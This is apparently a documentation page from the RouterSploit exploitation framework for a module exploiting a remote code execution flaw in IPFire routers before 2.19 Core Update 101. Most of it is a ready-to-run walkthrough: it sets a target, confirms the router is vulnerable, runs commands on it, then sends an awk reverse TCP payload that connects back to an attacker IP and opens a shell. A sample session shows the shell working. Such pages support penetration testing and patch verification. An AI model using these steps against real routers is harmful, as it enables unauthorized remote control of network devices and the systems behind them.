Skip to content

R
routersploit
Switch branch/tag
Find file
BlameHistoryPermalink
ipfire_proxy_rce.md 2.38 KB

Description

This module exploits IPFire < 2.19 Core Update 101 Remote Code Execution vulnerability which allows executing commands on operating system level.

Verification Steps

1. Start `./rsf.py`
2. Do: `use exploits/routers/ipfire/ipfire_proxy_rce`
3. Do: `set target [TargetIP]`
4. Do: `run`
5. If router is vulnerable, it should be possible to execute commands on operating system level.

6. Do: `set payload awk_reverse_tcp`
7. Do: `set lhost [AttackerIP]`
8. Do: `run`
9. Payload is sent to device and executed providing attacker with the command shell.

Scenarios

rsf > use exploits/routers/ipfire/ipfire_proxy_rce
rsf (IPFire Proxy RCE) > set target 192.168.2.88
[+] target => 192.168.2.88
rsf (IPFire Proxy RCE) > run
[*] Running module...
[+] Target is vulnerable
[*] Invoking command loop...

[+] Welcome to cmd. Commands are sent to the target via the execute method.
[*] For further exploitation use 'show payloads' and 'set payload <payload>' commands.

cmd > uname -a
[*] Executing 'uname -a' on the device...
Linux ipfire 3.10.44-ipfire #1 SMP Tue Sep 9 18:11:30 GMT 2014 i686 i686 i386 GNU/Linux

cmd > show payloads
[*] Available payloads:

   Payload             Name                Description
   -------             ----                -----------
   awk_bind_udp        Awk Bind UDP        Creates an interactive udp bind shell by using (g)awk.
   awk_bind_tcp        Awk Bind TCP        Creates an interactive tcp bind shell by using (g)awk.
   awk_reverse_tcp     Awk Reverse TCP     Creates an interactive tcp reverse shell by using (g)awk.

cmd > set payload awk_reverse_tcp
cmd (Awk Reverse TCP) > show options

Payload Options:

   Name        Current settings     Description
   ----        ----------------     -----------
   lhost                            Connect-back IP address
   lport       5555                 Connect-back TCP Port
   encoder                          Encoder
   cmd         awk                  Awk binary


cmd (Awk Reverse TCP) > set lhost 192.168.2.100
lhost => 192.168.2.100
cmd (Awk Reverse TCP) > run
[*] Executing payload on the device
[*] Waiting for reverse shell...
[*] Connection from 192.168.2.88:44168
[+] Enjoy your shell
uname -a
Linux ipfire 3.10.44-ipfire #1 SMP Tue Sep 9 18:11:30 GMT 2014 i686 i686 i386 GNU/Linux
whoami
nobody
id
uid=99(nobody) gid=99(nobody) groups=16(dialout),23(squid),99(nobody)